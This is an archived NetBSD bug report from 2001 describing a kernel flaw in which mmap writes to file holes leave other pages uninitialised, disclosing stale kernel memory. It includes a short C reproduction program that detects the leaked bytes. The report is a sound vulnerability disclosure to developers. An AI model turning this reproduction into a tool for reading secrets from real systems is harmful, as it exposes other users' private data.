Subject: kern/13201: malicious user can get a copy of partial kernel memory
To: None <gnats-bugs@gnats.netbsd.org>
From: Atsushi Onoe <onoe@sm.sony.co.jp>
List: netbsd-bugs
Date: 06/14/2001 11:11:35 
>Number:         13201
>Category:       kern
>Synopsis:       malicious user can get a copy of partial kernel memory
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    kern-bug-people
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Wed Jun 13 19:10:00 PDT 2001
>Closed-Date:
>Last-Modified:
>Originator:     Atsushi Onoe
>Release:        NetBSD-current 010607
>Organization:
	Sony Corporation
>Environment:
System: NetBSD duplo.sm.sony.co.jp 1.5W NetBSD 1.5W (DUPLO) #422: Wed Jun 13 01:41:29 JST 2001 onoe@duplo.sm.sony.co.jp:/work/netbsd/obj/DUPLO i386
Architecture: i386
Machine: i386
>Description:
	When a program write a data to a mmapped page whose corresponding
	file system block is not assigned yet (i.e. hole), other pages
	within the block is not initialized to zero and stored to the
	allocated block of the file system.
	This is obviously broken for the application, and it may disclose
	some of kernel memory to the user, which may include private
	mail, password, ...

	Since the problem occurs only in odd page at the file, I think
	it occurs only in the environment whose fsbsize > page size.

	NetBSD 1.5.1 seems to OK.

	See PR 13189.

>How-To-Repeat:
	Run attached program.

	% ./a.out
	filling 32768 pages
	testing 32768 pages
	a.out: corrupted: off 0x1001 data 0x8a

/*------------------------------------------------------------------*/
#include <sys/types.h>
#include <sys/mman.h>
#include <err.h>
#include <fcntl.h>
#include <stdio.h>

#define	FNAME	"testfile"
#define	FSIZE	(128*1024*1024)		/* total physical memory */
#define	PSIZE	4096			/* page size */

u_char zero[PSIZE];

main()
{
	int fd, off, i;
	u_char *p;

	if ((fd = open(FNAME, O_RDWR | O_CREAT | O_TRUNC, 0666)) < 0)
		err(1, "open: %s", FNAME);
	if (ftruncate(fd, FSIZE) < 0)
		err(1, "ftruncate: 0x%x", FSIZE);
	p = mmap(NULL, FSIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
	if (p == MAP_FAILED)
		err(1, "mmap");
	printf("filling %d pages\n", FSIZE / PSIZE);
	for (off = 0; off < FSIZE; off += PSIZE)
		p[off] = 'a';
	zero[0] = 'a';
	printf("testing %d pages\n", FSIZE / PSIZE);
	for (off = 0; off < FSIZE; off += PSIZE) {
		if (memcmp(p + off, zero, PSIZE) != 0) {
			for (i = 0; i < PSIZE; i++, off++)
				if (p[off] != zero[i])
					break;
			errx(2, "corrupted: off 0x%x data 0x%x", off, p[off]);
		}
	}
	printf("test ok\n");
	exit(0);
}
/*------------------------------------------------------------------*/
>Fix:
	none provided.
>Release-Note:
>Audit-Trail:
>Unformatted: